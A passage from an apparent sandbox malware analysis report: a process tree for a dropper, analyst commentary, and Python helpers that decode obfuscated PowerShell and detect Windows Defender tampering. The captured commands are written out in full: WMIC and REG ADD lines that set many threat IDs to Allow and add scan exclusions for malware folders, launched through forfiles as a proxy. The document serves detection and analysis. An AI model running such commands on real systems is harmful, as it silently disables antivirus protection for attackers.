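               'cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAA'
               'dQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==')


def decode_encoded_command(cmd):
    """Decode -e / -ec / -enc / -EncodedCommand <base64>; returns None if the switch is absent."""
    m = re.search(r'-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)', cmd, re.IGNORECASE)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode('utf-16-le')


def deobfuscate_replace_split(cmd):
    """Recover the $t literal and replay the script's own .replace(<filler>,'').split(<sep>,<n>).

    Returns the list of pieces the script would have in $t, or None if the pattern is absent."""
    m = re.search(r"\$t='((?:[^']|'')*)'\.replace\('(.)',''\)\.split\('(.)',(\d+)\)", cmd)
    if not m:
        return None
    literal, filler, sep, count = m.groups()
    clean = literal.replace("''", "'")        # PowerShell escapes ' inside '...' as ''
    return clean.replace(filler, '').split(sep, int(count) - 1)   # String.Split count = max pieces


def extract_urls(text):
    return re.findall(r"https?://[^\s'\"()]+", text)


if __name__ == '__main__':
    pieces = deobfuscate_replace_split(HASHED_CMD)
    print('pieces :', pieces)
    print('urls   :', extract_urls(pieces[1]))
    print('encoded:', decode_encoded_command(ENCODED_CMD))
```

Both decoders are deliberately narrow: they undo the exact transformations the script applies rather than evaluating anything, which is the safe way to get IOCs out of a command line captured from a sandbox.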
[depth 2] C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\wjichPy.exe
    C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\wjichPy.exe W8 /site_id 668658 /S
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS

[depth 3] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &

[depth 4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"

[depth 5] C:\Windows\SysWOW64\cmd.exe
    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True

[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS

[depth 7] C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True

[depth 4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"

[depth 5] C:\Windows\SysWOW64\cmd.exe
    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True

[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS

[depth 7] C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True

[depth 4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"

[depth 5] C:\Windows\SysWOW64\cmd.exe
    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True

[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
    - Drops file in System32 directory

[depth 7] C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True

[depth 4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"

[depth 5] C:\Windows\SysWOW64\cmd.exe
    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True

[depth 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS

[depth 7] C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS

[depth 4] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

[depth 5] C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
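The wjichPy.exe subtree above neuters Defender for specific detections rather than switching it off: each WMIC call adds a ThreatIDDefaultAction entry through the MSFT_MpPreference class with Actions=6, and the REG ADD lines write the same threat IDs under the Group Policy key HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction with value 6, once per registry view (/reg:32 and /reg:64) so both 32-bit and 64-bit readers agree. In the MpPreference encoding 6 means Allow, so every listed threat ID becomes a permitted detection; the sibling powershell at depth 3 below then adds Exclusions\Paths entries for several directories, including the Temp folder wjichPy.exe itself runs from. Each WMIC call is also launched through `forfiles /c`, a proxy-execution trick that separates the WMIC process from the dropper by several layers of cmd and powershell and defeats a naive parent-child rule. The Python below is an added example, not from the report: detection logic run over those command lines, with the samples copied from the tree plus one constructed benign REG ADD as a control. The action-code table is the one documented for MSFT_MpPreference.

```python
"""Defender-tampering detection over WMIC/REG command lines like those in the tree above.
Added example; sample lines are copied from the report, plus one constructed benign control."""
import re

# ThreatIDDefaultAction_Actions codes from the MSFT_MpPreference documentation.
DEFENDER_ACTIONS = {1: 'Clean', 2: 'Quarantine', 3: 'Remove', 6: 'Allow',
                    8: 'UserDefined', 9: 'NoAction', 10: 'Block'}
POLICY_THREATS = r'hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction'
POLICY_EXCLUSIONS = r'hklm\software\policies\microsoft\windows defender\exclusions\paths'

# Constructed sample input: five lines copied from the process tree, one benign control line.
SAMPLE_LINES = [
    r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True',
    r'forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:32',
    r'REG ADD "HKCU\Software\ExampleVendor\ExampleApp" /f /v FirstRun /t REG_DWORD /d 0',   # benign control (constructed)
]


def scan_line(cmd):
    """Return a list of findings for one command line (empty for benign lines)."""
    low = cmd.lower()
    found = []
    # WMI route: MSFT_MpPreference ... Add ThreatIDDefaultAction_Ids=<id> ThreatIDDefaultAction_Actions=<n>
    tid = re.search(r'threatiddefaultaction_ids=(\d+)', low)
    act = re.search(r'threatiddefaultaction_actions=(\d+)', low)
    if 'msft_mppreference' in low and tid and act:
        found.append({'kind': 'threat_default_action', 'via': 'wmi',
                      'threat_id': int(tid.group(1)),
                      'action': DEFENDER_ACTIONS.get(int(act.group(1)), act.group(1))})
    # Group Policy route: REG ADD ...\Threats\ThreatIDDefaultAction /v <id> /t REG_SZ /d <n>
    if POLICY_THREATS in low:
        m = re.search(r'/v\s+"?(\d+)"?.*?/d\s+"?(\d+)"?', low)
        if m:
            found.append({'kind': 'threat_default_action', 'via': 'registry-policy',
                          'threat_id': int(m.group(1)),
                          'action': DEFENDER_ACTIONS.get(int(m.group(2)), m.group(2)),
                          'view': 'wow64' if '/reg:32' in low else 'native'})
    # Path exclusion via policy key
    if POLICY_EXCLUSIONS in low:
        m = re.search(r'/v\s+"([^"]+)"', cmd, re.IGNORECASE)
        if m:
            found.append({'kind': 'exclusion_path', 'via': 'registry-policy', 'path': m.group(1)})
    # forfiles used as a proxy launcher for cmd/powershell
    if re.search(r'\bforfiles\b.*/c\s+"?(?:cmd|powershell)\b', low):
        found.append({'kind': 'proxy_execution', 'via': 'forfiles'})
    return found


def summarize(lines):
    """Aggregate findings over many command lines into an analyst-facing summary."""
    findings = [f for line in lines for f in scan_line(line)]
    return {
        'allowed_threat_ids': sorted({f['threat_id'] for f in findings
                                      if f['kind'] == 'threat_default_action' and f['action'] == 'Allow'}),
        'excluded_paths': [f['path'] for f in findings if f['kind'] == 'exclusion_path'],
        'proxy_execution': sum(f['kind'] == 'proxy_execution' for f in findings),
        'findings': findings,
    }


if __name__ == '__main__':
    s = summarize(SAMPLE_LINES)
    print('threat IDs set to Allow :', s['allowed_threat_ids'])
    print('excluded paths          :', s['excluded_paths'])
    print('forfiles proxy launches :', s['proxy_execution'])
```

On a live host the same facts can be confirmed without the command lines: `Get-MpPreference` lists ThreatIDDefaultAction_Ids/_Actions and ExclusionPath, and the policy key above shows the REG ADD entries under both the native and WOW6432Node views.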
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NMbcPgNClKinC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NMbcPgNClKinC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\STjmdXhOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\STjmdXhOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YceypsUXabDXnCzNCPR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YceypsUXabDXnCzNCPR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZHcfdgyasGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZHcfdgyasGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gaSWcYIjjvwU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gaSWcYIjjvwU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QPFeEjmgnBUOfRVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QPFeEjmgnBUOfRVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 
\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nyFjvKGtfVGLAKAU\" /t REG_DWORD /d 0 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YceypsUXabDXnCzNCPR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZHcfdgyasGUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gaSWcYIjjvwU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QPFeEjmgnBUOfRVB /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QPFeEjmgnBUOfRVB /t REG_DWORD /d 0 /reg:644⤵
-
